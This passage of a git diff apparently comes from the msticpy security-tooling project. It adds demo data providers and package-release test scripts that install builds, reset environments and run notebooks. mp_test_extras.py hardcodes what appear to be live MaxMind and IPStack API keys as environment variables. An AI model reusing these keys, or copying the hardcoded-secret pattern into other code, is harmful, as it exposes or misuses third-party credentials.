+    def __init__(self):
+        """Initialize demo_provider."""
+        self.connected = False
+        self.loaded = True
+        self.connection_str = ""
+
+    def connect(self, connection_str="default", **kwargs):
+        """Connect to data source."""
+        del kwargs
+        self.connected = True
+        self.connection_str = connection_str
+        print("Connected.")
+
+
+# pylint: enable=too-few-public-methods
+
+
+class QueryProviderDemo(QueryProvider):
+    """Query provider for demo data."""
+
+    _DATA_DEFS = {
+        "SecurityAlert": {"list_alerts": "data/alerts_list.pkl"},
+        "WindowsSecurity": {
+            "get_process_tree": "data/process_tree.pkl",
+            "list_host_processes": "data/processes_on_host.pkl",
+            "list_host_logons": ".data/host_logons.pkl",
+            "list_host_logon_failures": "data/failedLogons.pkl",
+            "list_host_events": "data/all_events_df.pkl",
+        },
+        "Network": {
+            "list_azure_network_flows_by_ip": "data/az_net_comms_df.pkl",
+            "list_azure_network_flows_by_host": "data/az_net_comms_df.pkl",
+        },
+    }
+
+    # pylint: disable=super-init-not-called
+    def __init__(self, **kwargs):
+        """Initialize Demo query provider."""
+        self._environment = kwargs.get("data_environment", "default environment")
+        print(f"{self.__class__.__name__} initialized for {self._environment}")
+        data_src_file = kwargs.get("data_src_file")
+        if not data_src_file:
+            data_srcs = self._DATA_DEFS
+            # raise ValueError("no query definition file name")
+        else:
+            with open(data_src_file, "r") as src_file:
+                data_srcs = yaml.safe_load(src_file)
+        self.query_store = {}
+        self._query_provider = _DataDriver()
+        self.all_queries = QueryContainer()
+        self._add_demo_query_functions(data_srcs)
+
+    def _add_demo_query_functions(self, data_defs: Dict[str, Dict[str, str]]):
+        for family, queries in data_defs.items():
+            if not hasattr(self, family):
+                setattr(self, family, QueryContainer())
+            query_family = getattr(self, family)
+
+            for query_name, file_name in queries.items():
+
+                # Create the partial function
+                query_func = partial(
+                    self._execute_query,
+                    data_family=family,
+                    query_name=query_name,
+                    data_file=file_name,
+                )
+
+                setattr(query_family, query_name, query_func)
+                setattr(self.all_queries, query_name, query_func)
+                self.query_store[f"{family}.{query_name}"] = file_name
+
+    def connect(self, connection_str: str = None, **kwargs):
+        """
+        Connect to data source.
+
+        Parameters
+        ----------
+        connection_str : str
+            Connection string for the data source
+
+        """
+        return self._query_provider.connect(connection_str=connection_str, **kwargs)
+
+    @property
+    def schema(self) -> Dict[str, Dict]:
+        """
+        Return current data schema of connection.
+
+        Returns
+        -------
+        Dict[str, Dict]
+            Data schema of current connection.
+
+        """
+        return {}
+
+    @property
+    def schema_tables(self) -> List[str]:
+        """
+        Return list of tables in the data schema of the connection.
+
+        Returns
+        -------
+        List[str]
+            Tables in the of current connection.
+
+        """
+        return []
+
+    def import_query_file(self, query_file: str):
+        """
+        Import a yaml data source definition.
+
+        Parameters
+        ----------
+        query_file : str
+            Path to the file to import
+
+        """
+        raise NotImplementedError()
+
+    def list_queries(self) -> List[str]:
+        """
+        Return list of family.query in the store.
+
+        Returns
+        -------
+        Iterable[str]
+            List of queries
+
+        """
+        return list(self.query_store.items())
+
+    def query_help(self, query_name):
+        """Print help for query."""
+        print(f"query_prov.{self.query_store[query_name]}(**kwargs)")
+
+    def exec_query(self, query: str, **kwargs) -> Union[pd.DataFrame, Any]:
+        """
+        Execute simple query string.
+
+        Parameters
+        ----------
+        query : str
+            [description]
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            Query results - a DataFrame if successful
+            or a KqlResult if unsuccessful.
+
+        """
+        raise NotImplementedError()
+
+    def _execute_query(self, *args, **kwargs) -> Union[pd.DataFrame, Any]:
+        if not self._query_provider.loaded:
+            raise ValueError("Provider is not loaded.")
+        if not self._query_provider.connected:
+            raise ValueError(
+                "No connection to a data source.",
+                "Please call connect(connection_str) and retry.",
+            )
+        sleep(1)
+        query_name = kwargs.pop("query_name")
+        data_file = kwargs.pop("data_file")
+        return read_pd_df(data_file, query_name)
+
+
+def read_pd_df(data_file, query_name):
+    """Read DataFrame from file."""
+    if not Path(data_file).is_file():
+        raise FileNotFoundError(
+            f"Data file {data_file} for query {query_name} not found."
+        )
+
+    if data_file.lower().endswith("csv"):
+        return pd.read_csv(
+            data_file, infer_datetime_format=True, parse_dates=["TimeGenerated"]
+        )
+    return pd.read_pickle(data_file)
+
+
+class TILookupDemo:
+    """TILookup demo class."""
+
+    _DATA_DEFS = {"ipv4": "data/ti_results_ipv4.pkl", "url": "data/ti_results_url.pkl"}
+
+    def lookup_ioc(self, ioc_type, **kwargs):
+        """Lookup single IoC."""
+        del kwargs
+        sleep(1)
+        return read_pd_df(self._DATA_DEFS.get(ioc_type), ioc_type)
+
+    @staticmethod
+    def result_to_df(results):
+        """Convert IoC results to DataFrame."""
+        if isinstance(results, pd.DataFrame):
+            return results
+        return pd.DataFrame()
+
+
+# pylint: disable=too-few-public-methods
+class GeoLiteLookupDemo:
+    """GeoLitLookup demo class."""
+
+    _DATA_DEFS = {"ip_locs": "data/ip_locations.pkl"}
+
+    def lookup_ip(
+        self,
+        ip_address: str = None,
+        ip_addr_list: Iterable = None,
+        ip_entity: Any = None,
+    ):
+        """Look up location."""
+        del ip_address, ip_addr_list, ip_entity
+        with open(self._DATA_DEFS["ip_locs"], "rb") as iploc_file:
+            # B301 - pickled file is trusted
+            ip_locs = pickle.load(iploc_file)  # nosec
+        return str(ip_locs), ip_locs
+
+
+# pylint: enable=too-few-public-methods
+
+
+_ASN_DATA = pd.read_pickle("data/az_whois.df.pkl")
+
+
+def get_whois_info_demo(ip_addr, show_progress=False):
+    """Lookup Whois data from dataframe."""
+    sleep(0.02)
+    if show_progress:
+        print(".", end="")
+    if "ExtASN" not in _ASN_DATA.columns:
+        return "Unknown", {}
+    match_row = _ASN_DATA[_ASN_DATA["AllExtIPs"] == ip_addr]
+    asn_text = match_row["ExtASN"].unique()[0]
+    if isinstance(asn_text, tuple):
+        return asn_text[0], {}
+    return asn_text, {}
diff --git a/tools/mp_test_extras.py b/tools/mp_test_extras.py
new file mode 100644
index 000000000..6fd4a8248
--- /dev/null
+++ b/tools/mp_test_extras.py
@@ -0,0 +1,232 @@
+"""Test runs for different extras."""
+import argparse
+from datetime import datetime
+import os
+import subprocess  # nosec
+
+
+# pylint: disable=subprocess-run-check
+
+DEF_PKG_LIST = """
+apipkg              1.5
+argon2-cffi         20.1.0
+async-generator     1.10
+atomicwrites        1.4.0
+attrs               20.3.0
+backcall            0.2.0
+bleach              3.2.1
+cffi                1.14.4
+colorama            0.4.4
+coverage            5.3
+cycler              0.10.0
+decorator           4.4.2
+defusedxml          0.6.0
+entrypoints         0.3
+execnet             1.7.1
+iniconfig           1.1.1
+ipykernel           5.3.4
+ipython             7.18.1
+ipython-genutils    0.2.0
+ipywidgets          7.5.1
+jedi                0.17.2
+Jinja2              2.11.2
+jsonschema          3.2.0
+jupyter             1.0.0
+jupyter-client      6.1.7
+jupyter-console     5.2.0
+jupyter-core        4.6.3
+jupyterlab-pygments 0.1.2
+kiwisolver          1.3.1
+MarkupSafe          1.1.1
+matplotlib          3.2.0
+mistune             0.8.4
+nbclient            0.5.1
+nbconvert           6.0.7
+nbformat            5.0.8
+nest-asyncio        1.4.1
+notebook            6.1.4
+numpy               1.19.3
+packaging           20.7
+pandas              1.1.5
+pandocfilters       1.4.3
+parso               0.7.1
+pickleshare         0.7.5
+pip                 20.1.1
+pluggy              0.13.1
+prometheus-client   0.9.0
+prompt-toolkit      3.0.8
+py                  1.9.0
+pycparser           2.20
+Pygments            2.7.1
+pyparsing           2.4.7
+pyrsistent          0.17.3
+pytest              6.1.2
+pytest-check        0.3.9
+pytest-cov          2.10.1
+pytest-xdist        2.1.0
+python-dateutil     2.8.1
+pytz                2020.4
+pywin32             300
+pywinpty            0.5.7
+pyzmq               19.0.2
+qtconsole           5.0.1
+QtPy                1.9.0
+respx               0.17.1
+Send2Trash          1.5.0
+setuptools          47.1.0
+six                 1.15.0
+terminado           0.9.1
+testpath            0.4.4
+toml                0.10.2
+tornado             6.0.4
+traitlets           5.0.5
+wcwidth             0.2.5
+webencodings        0.5.1
+widgetsnbextension  3.5.1
+"""
+
+
+base_pkgs = [pkg.split()[0] for pkg in DEF_PKG_LIST.split("\n") if pkg]
+
+
+def _install_pkg(app_args):
+
+    extra_spec = f"[{','.join(app_args.extras)}]" if app_args.extras else ""
+    sp_run = [
+        "python",
+        "-m",
+        "pip",
+        "install",
+        "--disable-pip-version-check",
+        "--no-cache-dir" if app_args.nocache else "",
+        "-f",
+        "e:\\src\\microsoft\\msticpy\\dist",
+        f"msticpy{extra_spec}==0.9.0a1",
+    ]
+
+    start = datetime.now()
+    print(f"Install extras {app_args.extras}")
+    print("start", start)
+    print(sp_run)
+    if not test:
+        subprocess.run(sp_run, shell=True)  # nosec
+
+    end = datetime.now()
+    print("end", end)
+    print("duration", end - start)
+
+
+def _reset_pkgs():
+    sp_run = [
+        "python",
+        "-m",
+        "pip",
+        "list",
+        "--disable-pip-version-check",
+    ]
+    proc_call = subprocess.run(sp_run, shell=True, capture_output=True)  # nosec
+    inst_pkgs = proc_call.stdout.decode("utf-8").split("\n")[2:]
+    inst_pkgs = {pkg.split()[0] for pkg in inst_pkgs if pkg and not pkg.startswith("-")}
+    print(f"{len(inst_pkgs)} packages installed")
+    remove_pkgs = inst_pkgs - set(base_pkgs)
+
+    if remove_pkgs:
+        pip_cmd = sp_run.index("list")
+        sp_run[pip_cmd] = "uninstall"
+        sp_run.extend(["-y", *remove_pkgs])
+        print(sp_run)
+        if not test:
+            subprocess.run(sp_run, shell=True)  # nosec
+    else:
+        print("No packages to remove")
+
+
+_MP_SRC = "/src/microsoft/msticpy"
+
+
+def _run_tests():
+    os.environ["MSTICPYCONFIG"] = f"{_MP_SRC}/tests/msticpyconfig-test.yaml"
+    os.environ["MAXMIND_AUTH"] = "fwX9fbj9srTpJpKA"
+    os.environ["IPSTACK_AUTH"] = "6ab9b0edbe908a17da4f9e69adc30611"
+    sp_run = [
+        "pytest",
+        "-r",
+        "fEp",
+        "--disable-warnings",
+        "--show-capture=no",
+        "--tb=no",
+        "--continue-on-collection-errors",
+        "--cov=msticpy",
+    ]
+    print(sp_run)
+    if test:
+        cur_dir = os.getcwd()
+        os.chdir(_MP_SRC)
+        subprocess.run(sp_run, shell=True)  # nosec
+        os.chdir(cur_dir)
+
+
+def _add_script_args():
+    parser = argparse.ArgumentParser(description="Msticpy test installer")
+    parser.add_argument(
+        "--install",
+        "-i",
+        action="store_true",
+        required=False,
+        default=False,
+        help="Run install",
+    )
+    parser.add_argument(
+        "--extras",
+        "-e",
+        nargs="+",
+        required=False,
+        default=None,
+        help="Name of extras",
+    )
+    parser.add_argument(
+        "--nocache",
+        "-n",
+        action="store_true",
+        required=False,
+        default=False,
+        help="Run pip with --no-cache-dir option",
+    )
+    parser.add_argument(
+        "--reset",
+        "-r",
+        action="store_true",
+        default=False,
+        help="Uninstall everying but base",
+    )
+    parser.add_argument(
+        "--test",
+        "-t",
+        action="store_true",
+        default=False,
+        help="Run tests",
+    )
+    parser.add_argument(
+        "--check",
+        "-c",
+        action="store_true",
+        default=False,
+        help="Run in check mode",
+    )
+    return parser
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    arg_parser = _add_script_args()
+    args = arg_parser.parse_args()
+
+    test = args.test
+    if args.install:
+        _install_pkg(args)
+
+    if args.reset:
+        _reset_pkgs()
+
+    if args.test:
+        _run_tests()
diff --git a/tools/print_call_tree.py b/tools/print_call_tree.py
new file mode 100644
index 000000000..5f8fcc1c3
--- /dev/null
+++ b/tools/print_call_tree.py
@@ -0,0 +1,45 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Python file import analyzer."""
+import argparse
+
+from toollib import VERSION
+from toollib.module_tree import analyze_calls, print_call_tree
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def _add_script_args():
+    parser = argparse.ArgumentParser(description="Module static call tree analyer.")
+    parser.add_argument(
+        "--module", "-m", default=".", required=True, help="Path to module to analyze."
+    )
+    parser.add_argument(
+        "--all",
+        "-a",
+        action="store_true",
+        default=False,
+        help="Show all functions in module. Default shows only top-level functions",
+    )
+    parser.add_argument(
+        "--external",
+        "-e",
+        action="store_true",
+        default=False,
+        help="Show all calls including to external functions.",
+    )
+    return parser
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    arg_parser = _add_script_args()
+    args = arg_parser.parse_args()
+
+    mod_call_graph = analyze_calls(args.module, all_calls=args.external)
+    p_level = "all" if args.all else "top"
+    print_call_tree(call_graph=mod_call_graph, level=p_level)
diff --git a/tools/test-pypi-test-pkg.cmd b/tools/test-pypi-test-pkg.cmd
new file mode 100644
index 000000000..2eabd0c2c
--- /dev/null
+++ b/tools/test-pypi-test-pkg.cmd
@@ -0,0 +1,119 @@
+@echo off
+if "%1" equ "" goto usage
+if "%2" equ "" goto usage
+if "%1" equ "/?" goto usage
+if /I "%1" equ "--help" goto usage
+if /I "%1" equ "-h" goto usage
+if "%3" equ "" goto no_ver
+set mp_pkg=msticpy==%3
+goto ver_spec
+:no_ver
+set mp_pkg=msticpy
+:ver_spec
+
+set h_rule=------------------------------------------------------------
+echo %h_rule%
+echo MSTICPY Package release test
+echo %h_rule%
+if "%3" neq "" echo testing with version %3
+
+
+REM test folder
+pushd %2 > nul 2>&1
+if %ERRORLEVEL% equ 0 goto check_env
+echo %2 is not a valid directory
+goto :EOF
+
+:check_env
+conda env list | findstr "%1"
+if %ERRORLEVEL% neq 0 goto create_env
+echo %1 is a current conda environment.
+echo You should run this test in a clean environment.
+echo Ctrl-C to abort or
+pause
+
+:create_env
+echo %h_rule%
+echo Creating environment %1...
+call conda create --yes --name %1
+echo Activating environment %1...
+call conda activate %1
+echo.
+echo %h_rule%
+echo Install Python
+call conda install --yes python==3.7.6
+call conda install --yes pip
+echo.
+echo %h_rule%
+echo Installing msticpy...
+pip install --upgrade --index-url https://test.pypi.org/simple/ --extra-index-url https://pypi.org/simple %mp_pkg%
+
+echo %h_rule%
+echo Preparing to run notebooks. Crtl-C to abort.
+echo.
+echo Installing nbconvert and jupyter extensions...
+call conda install --yes nbconvert
+call conda install --yes jupyter_contrib_nbextensions
+pip install --upgrade ipython
+set nb_path=docs/notebooks
+if "%2" neq "" set nb_path=%2
+pushd %nb_path%
+echo.
+echo %h_rule%
+echo Running notebooks from %nb_path%...
+set nbconver_opts=--execute --ExecutePreprocessor.timeout=60 --ExecutePreprocessor.kernel_name=python3 --to notebook
+set NB=Base64Unpack.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=EventTimeline.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=FoliumMap.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=GeoIPLookups.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=NotebookWidgets.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=ProcessTree.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+
+echo %h_rule%
+echo All notebooks ran successfully.
+
+
+echo.
+echo %h_rule%
+echo Cleaning up...
+echo removing notebook output files
+del *.nbconvert.ipynb
+call conda deactivate
+echo.
+echo About to remove the %1 environment. Ctrl-C to abort
+pause
+call conda env remove -n %1
+popd
+echo %h_rule%
+echo Test completed.
+echo %h_rule%
+
+goto end
+
+:nb_error
+echo %h_rule%
+echo Error encountered running notebook %NB%
+echo Test Failed
+echo %h_rule%
+popd
+goto end
+
+:usage
+echo Usage:
+echo    %~n0 test-env-name [path-to-notebooks] [package-version]
+echo.
+
+:end
+
diff --git a/tools/test_mp_extras.py b/tools/test_mp_extras.py
new file mode 100644
index 000000000..5c7906bd5
--- /dev/null
+++ b/tools/test_mp_extras.py
@@ -0,0 +1,315 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Script to test msticpy extras."""
+import argparse
+from datetime import datetime
+from pathlib import Path
+import pkg_resources
+import subprocess
+import sys
+
+__author__ = "Ian Hellen"
+
+base_pkgs = [
+    "argon2-cffi",
+    "async-generator",
+    "atomicwrites",
+    "attrs",
+    "backcall",
+    "bleach",
+    "cffi",
+    "colorama",
+    "decorator",
+    "defusedxml",
+    "entrypoints",
+    "iniconfig",
+    "ipykernel",
+    "ipython",
+    "ipython-genutils",
+    "ipywidgets",
+    "jedi",
+    "Jinja2",
+    "jsonschema",
+    "jupyter",
+    "jupyter-client",
+    "jupyter-console",
+    "jupyter-core",
+    "jupyterlab-pygments",
+    "MarkupSafe",
+    "mistune",
+    "nbclient",
+    "nbconvert",
+    "nbformat",
+    "nest-asyncio",
+    "notebook",
+    "packaging",
+    "pandocfilters",
+    "parso",
+    "pickleshare",
+    "pip",
+    "pluggy",
+    "prometheus-client",
+    "prompt-toolkit",
+    "py",
+    "pycparser",
+    "Pygments",
+    "pyparsing",
+    "pyrsistent",
+    "pytest",
+    "python-dateutil",
+    "pywin32",
+    "pywinpty",
+    "pyzmq",
+    "qtconsole",
+    "QtPy",
+    "Send2Trash",
+    "setuptools",
+    "six",
+    "terminado",
+    "testpath",
+    "toml",
+    "tornado",
+    "traitlets",
+    "wcwidth",
+    "webencodings",
+    "wheel",
+    "widgetsnbextension",
+]
+
+
+# pylint: disable=subprocess-run-check
+
+VERB_ARGS = {"stdout": sys.stdout, "stderr": sys.stderr}
+
+
+def install_pkg(extra: str, path: str, version: str, verbose: bool):
+    """
+    Install msticpy with extra from distrib path.
+
+    Parameters
+    ----------
+    extra : str
+        extra to install (default none)
+    path : str
+        path of the distribution
+    version : str
+        the version number of the package to install
+    verbose : bool
+        Emit verbose output for subproceses.
+
+
+    """
+    sp_run = [
+        "python",
+        "-m",
+        "pip",
+        "install",
+        "-f",
+        f"{path}/dist",
+        "msticpy{extra_spec}=={ver}".format(
+            extra_spec=f"[{extra}]" if extra else "",
+            ver=version,
+        ),
+    ]
+
+    print(f"Installing msticpy from {path}, extra={extra}")
+    start = datetime.now()
+    print("start", start)
+    print(sp_run)
+    if verbose:
+        print(" ".join(sp_run))
+    subprocess.run(sp_run, check=True, **(VERB_ARGS if verbose else {}))  # type: ignore
+
+    end = datetime.now()
+    print("end", end)
+    print("duration", end - start)
+
+
+def reset_pkgs(verbose: bool):
+    """Reset enviroment - remove all non-core msticpy packages."""
+    sp_run = [
+        "python",
+        "-m",
+        "pip",
+        "list",
+    ]
+    inst_pkgs = _get_installed_pkgs()
+    remove_pkgs = inst_pkgs - set(base_pkgs)
+    # don't deinstall these packages
+    remove_pkgs = remove_pkgs - set(("pip", "setuptools", "wheel"))
+
+    if not remove_pkgs:
+        print("No packages to uninstall")
+        return
+    sp_run.remove("list")
+    sp_run.extend(["uninstall", "-y", *remove_pkgs])
+    print("Removing non-core packages")
+    print(sp_run)
+    if verbose:
+        print(" ".join(sp_run))
+    subprocess.run(sp_run, check=True, **(VERB_ARGS if verbose else {}))  # type: ignore
+
+
+def show_dist(path: str):
+    """List current distributions."""
+    dist_vers = Path(path).joinpath("dist").glob("*.tar.gz")
+    for dist in dist_vers:
+        print(str(dist.name).replace(".tar.gz", ""))
+
+
+def run_tests(path: str, verbose: bool):
+    """Run pytest on `path`."""
+    sp_run = ["pytest"]
+    inst_pkgs = _get_installed_pkgs()
+    if "pytest-xdist" in inst_pkgs:
+        sp_run.extend(["-n", "auto"])
+    sp_run.append(path)
+    print("Running tests")
+    if verbose:
+        print(" ".join(sp_run))
+    subprocess.run(sp_run, cwd=path, check=True, **(VERB_ARGS if verbose else {}))  # type: ignore
+
+
+def _get_installed_pkgs():
+    sp_run = [
+        "python",
+        "-m",
+        "pip",
+        "list",
+    ]
+    proc_call = subprocess.run(sp_run, check=True, stdout=subprocess.PIPE)  # type: ignore
+    inst_pkgs = proc_call.stdout.decode("utf-8").split("\n")[2:]
+    return {pkg.split()[0] for pkg in inst_pkgs if pkg.strip()}
+
+
+def create_baseline(output=None):
+    """Create baseline file for current packages."""
+    output = output or "baseline_pkg.txt"
+    with open(output, "w", encoding="utf-8") as bl_file:
+        bl_file.write("\n".join(sorted(_get_installed_pkgs())))
+    print(f"baseline packages written to {output}")
+
+
+def make_dist(path: str, verbose: bool):
+    """Create distrib at `path`."""
+    sp_run = [
+        "python",
+        "setup.py",
+        "sdist",
+        "bdist_wheel",
+    ]
+    print("Creating distrib wheel")
+    if verbose:
+        print(" ".join(sp_run))
+    subprocess.run(sp_run, cwd=path, **(VERB_ARGS if verbose else {}))  # type: ignore
+
+
+def _read_base_pkg_list(pkg_file):
+    with open(pkg_file, "r", encoding="utf-8") as pkg_fh:
+        pkg_lines = pkg_fh.readlines()
+    for pkg_line in pkg_lines:
+        try:
+            req = pkg_resources.Requirement.parse(pkg_line.strip())
+        except Exception:  # pylint: disable=broad-except
+            pass
+        yield req.name
+
+
+def _add_script_args():
+    parser = argparse.ArgumentParser(description="Msticpy extras test script.")
+    parser.add_argument(
+        "cmd",
+        choices=["install", "reset", "test", "makedist", "showdist", "baseline"],
+        help="\n".join(
+            [
+                "Run command: [install | reset | test | makedist | showdist | baseline]",
+                (
+                    "install - install msticpy from a dist folder (--path) with option extras"
+                    " (specified as a string with the --extras argument."
+                ),
+                (
+                    "reset - uninstall all packages apart from the baseline"
+                    " (baseline package file is specified with --base-packages argument)."
+                ),
+                "test - run pytest tests against current install.",
+                "makedist - create a setuptools distribution from --path",
+                "showdist - list the distributions in the 'dist' folder in --path",
+                (
+                    "baseline - create a baseline requirements file from current packages"
+                    " (specify output file as --output, default is baseline_pkg.txt"
+                ),
+            ]
+        ),
+    )
+    parser.add_argument(
+        "--extra",
+        "-e",
+        required=False,
+        default=None,
+        help="Name of extra",
+    )
+    parser.add_argument(
+        "--path",
+        "-p",
+        required=False,
+        default="/src/microsoft/msticpy",
+        help="Path to root of msticpy repo",
+    )
+    parser.add_argument(
+        "--version",
+        "-n",
+        required=False,
+        help="Version of msticpy to install",
+    )
+    parser.add_argument(
+        "--base-pkgs",
+        "-b",
+        required=False,
+        default=None,
+        help="File with base package list (for reset).",
+    )
+    parser.add_argument(
+        "--output",
+        "-o",
+        required=False,
+        default=None,
+        help="Specify file to store base package list (for reset).",
+    )
+    parser.add_argument(
+        "--verbose",
+        "-v",
+        action="store_true",
+        required=False,
+        default=False,
+        help="Show full output of commands.",
+    )
+    return parser
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    arg_parser = _add_script_args()
+    args = arg_parser.parse_args()
+
+    if args.cmd.casefold() == "install":
+        install_pkg(args.extra, args.path, args.version, args.verbose)
+
+    if args.cmd.casefold() == "baseline":
+        create_baseline(args.output)
+
+    if args.cmd.casefold() == "reset":
+        if args.base_pkgs:
+            base_pkgs = list(_read_base_pkg_list(args.base_pkgs))
+        reset_pkgs(args.verbose)
+
+    if args.cmd.casefold() == "test":
+        run_tests(args.path, args.verbose)
+
+    if args.cmd.casefold() == "makedist":
+        make_dist(args.path, args.verbose)
+
+    if args.cmd.casefold() == "showdist":
+        show_dist(args.path)
diff --git a/tools/test_mp_release.cmd b/tools/test_mp_release.cmd
new file mode 100644
index 000000000..111e58780
--- /dev/null
+++ b/tools/test_mp_release.cmd
@@ -0,0 +1,119 @@
+@echo off
+
+
+if "%1" equ "" goto usage
+if "%2" equ "" goto usage
+set nb_path=%~f2
+echo Notebooks folder = %nb_path%
+
+if "%1" equ "/?" goto usage
+if /I "%1" equ "--help" goto usage
+if /I "%1" equ "-h" goto usage
+set py_env_dir=%TEMP%\%1
+echo Virtual environment folder = %py_env_dir%
+if "%3" equ "" goto no_ver
+
+set mp_pkg=msticpy==%3
+goto ver_spec
+:no_ver
+set mp_pkg=msticpy
+:ver_spec
+
+set h_rule=------------------------------------------------------------
+echo %h_rule%
+echo MSTICPY Package release test
+echo %h_rule%
+if "%3" neq "" echo testing with version %3
+
+REM test folder
+pushd %2 > nul 2>&1
+if %ERRORLEVEL% equ 0 popd & goto create_env
+echo %2 is not a valid directory
+goto :EOF
+
+
+
+
+:create_env
+pushd %TEMP%
+echo %h_rule%
+echo Creating environment %1...
+python -m venv %1
+echo Activating environment %1...
+call %1\scripts\activate
+pip install wheel
+
+echo.
+echo %h_rule%
+echo Installing msticpy...
+pip install --upgrade --index-url https://test.pypi.org/simple/ --extra-index-url https://pypi.org/simple %mp_pkg%
+
+echo %h_rule%
+echo Preparing to run notebooks. Crtl-C to abort.
+echo.
+echo Installing nbconvert and jupyter extensions...
+pip install nbconvert
+pip install jupyter_contrib_nbextensions
+
+
+echo.
+echo %h_rule%
+echo Running notebooks from %nb_path%...
+set nbconver_opts=--ExecutePreprocessor.timeout=60 --ExecutePreprocessor.kernel_name=python3 --to notebook
+set NB=%nb_path%/Base64Unpack.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=%nb_path%/EventTimeline.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=%nb_path%/FoliumMap.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=%nb_path%/GeoIPLookups.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=%nb_path%/NotebookWidgets.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+set NB=%nb_path%/ProcessTree.ipynb
+jupyter nbconvert %nbconver_opts% --execute %NB%
+if ERRORLEVEL 1 goto nb_error
+
+echo %h_rule%
+echo All notebooks ran successfully.
+
+
+echo.
+echo %h_rule%
+echo Cleaning up...
+echo removing notebook output files
+del %nb_path%\*.nbconvert.ipynb
+call deactivate
+popd
+echo.
+echo About to remove the %1 environment. Ctrl-C to abort
+pause
+
+rmdir /s %py_env_dir%
+echo %h_rule%
+echo Test completed.
+echo %h_rule%
+
+goto end
+
+:nb_error
+echo %h_rule%
+echo Error encountered running notebook %NB%
+echo Test Failed
+echo Test environment still available at %py_env_dir%
+echo %h_rule%
+popd
+goto end
+
+:usage
+echo Usage:
+echo    %~n0 test-env-name [path-to-notebooks] [package-version]
+echo.
+
+:end
+
diff --git a/tools/test_mp_release.sh b/tools/test_mp_release.sh
new file mode 100644
index 000000000..515a832cb
--- /dev/null
+++ b/tools/test_mp_release.sh
@@ -0,0 +1,158 @@
+#!/bin/bash
+# Test script for MSTICPY releases to PyPI Test
+# Author: Ian Hellen
+
+usage(){
+    echo Usage:
+    echo    $1 src_root_path package-version
+}
+
+if [ $# -ne 2 ]; then
+    echo Usage:
+    echo    $1 src_root_path package-version
+    exit 0
+fi
+
+h_rule="----------------------------------------------------"
+warn_l="!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
+
+env_name="mp_test_$2"
+src_root=$( readlink -f $1 )
+env_path="$src_root/$env_name"
+mp_pkg_spec="msticpy==$2"
+
+echo $h_rule
+echo Started MSTICPy Test script
+date
+echo Using environment: $env_name
+echo Source Root: $src_root
+echo Environment scripts path: $env_path
+
+if [ ! -d $src_root ]; then
+    echo $src_root is not a valid directory
+    usage $0
+    exit 1
+fi
+
+# Check if MSTICPYCONFIG is set
+if [ -z ${MSTICPYCONFIG+x} ]; then
+    if [ -f $src_root/msticpyconfig.yaml ]; then
+        export MSTICPYCONFIG=$src_root/msticpyconfig.yaml
+    else
+        echo The MSTICPYCONFIG variable must be defined and point
+        echo to a value msticpyconfig.yaml with at least MaxMind auth key
+        echo defined
+        exit 1
+    fi
+fi
+
+if [ -z ${MSTICPYCONFIG+x} ] || [ ! -f $MSTICPYCONFIG ]; then
+    echo The MSTICPYCONFIG variable must be defined and point
+    echo to a value msticpyconfig.yaml with at least MaxMind auth key
+    echo defined
+    exit 1
+fi
+
+echo Using MSTICPYCONFIG: $MSTICPYCONFIG
+echo $h_rule
+
+pushd $src_root > /dev/null
+
+# clone repo
+echo Cloning msticpy repo
+if [ ! -f msticpy/setup.py ]; then
+    git clone --no-single-branch --depth 50 https://github.com/Microsoft/msticpy msticpy
+fi
+
+pushd msticpy > /dev/null
+git checkout --force master
+git pull origin master
+echo $h_rule
+
+popd > /dev/null
+
+# Python Venv
+
+# Check on existence of venv
+if [ ! -f $env_name/bin/activate ]; then
+    echo Creating environment $env_name...
+    python3 -m venv $env_name
+fi
+
+echo Activating environment $env_name...
+source $env_name/bin/activate
+python3 -m pip install wheel
+
+echo
+echo $h_rule
+echo pip installing msticpy from PyPI...
+python3 -m pip install --upgrade --index-url https://test.pypi.org/simple/ --extra-index-url https://pypi.org/simple $mp_pkg_spec
+
+echo $h_rule
+echo Installing nbconvert and jupyter extensions...
+python3 -m pip install nbconvert
+python3 -m pip install jupyter_contrib_nbextensions
+
+nb_path=msticpy/docs/notebooks
+pushd $nb_path > /dev/null
+
+echo ""
+echo $h_rule
+echo "Running notebooks from $nb_path..."
+nbconvert_opts="--ExecutePreprocessor.timeout=60 --ExecutePreprocessor.kernel_name=python3 --to notebook"
+
+failures=0
+success=0
+for NB in Base64Unpack.ipynb EventTimeline.ipynb GeoIPLookups.ipynb NotebookWidgets.ipynb ProcessTree.ipynb
+do
+    echo $env_path/bin/jupyter nbconvert $nbconvert_opts --execute $NB
+    pwd
+    $env_path/bin/jupyter nbconvert $nbconvert_opts --execute $NB
